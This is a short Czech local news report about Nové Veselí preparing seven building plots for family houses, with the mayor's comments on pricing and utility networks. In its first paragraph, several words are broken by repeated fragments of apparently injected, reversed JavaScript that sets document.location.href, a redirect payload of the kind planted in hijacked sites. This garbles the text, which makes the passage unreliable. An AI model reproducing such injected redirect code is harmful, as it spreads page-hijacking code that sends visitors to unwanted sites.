Rainbow page separator

Ve Veselí chystají parcely pro stavbu dalších rodinných domků

Čtvrtek, 29. dubna 2021

Nové Veselí, letecká fotografie

Nové Veselí / Dokončení přípravy lokality pro výstavbu dalších rodinných domků v místě „za po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokem“ v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce plánují zástupci Nového Veselí. „V současné době se dokončuje projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová dokumentace pro inženýrské sítě včetně komunikace. K prodeji bude sedm stavebních pozemků a tři jsou v soukromém vlastnictví,“ informoval starosta Nového Veselí Zdeněk Křivánek s tím, že případní zájemci o výstavbu domku ve zmíněné lokalitě mohou poslat svoji žádost novoveselskému úřadu.
Cenové a stavební podmínky za prodej stavebních pozemků budou veřejnosti sděleny v nejbližší době, přičemž prodejní cena připravené parcely se bude skládat z ceny za odkoupený pozemek a za realizaci inženýrských sítí. Soukromí majitelé pozemků ve zmíněné lokalitě se budou na zasíťování stavebních parcel finančně podílet.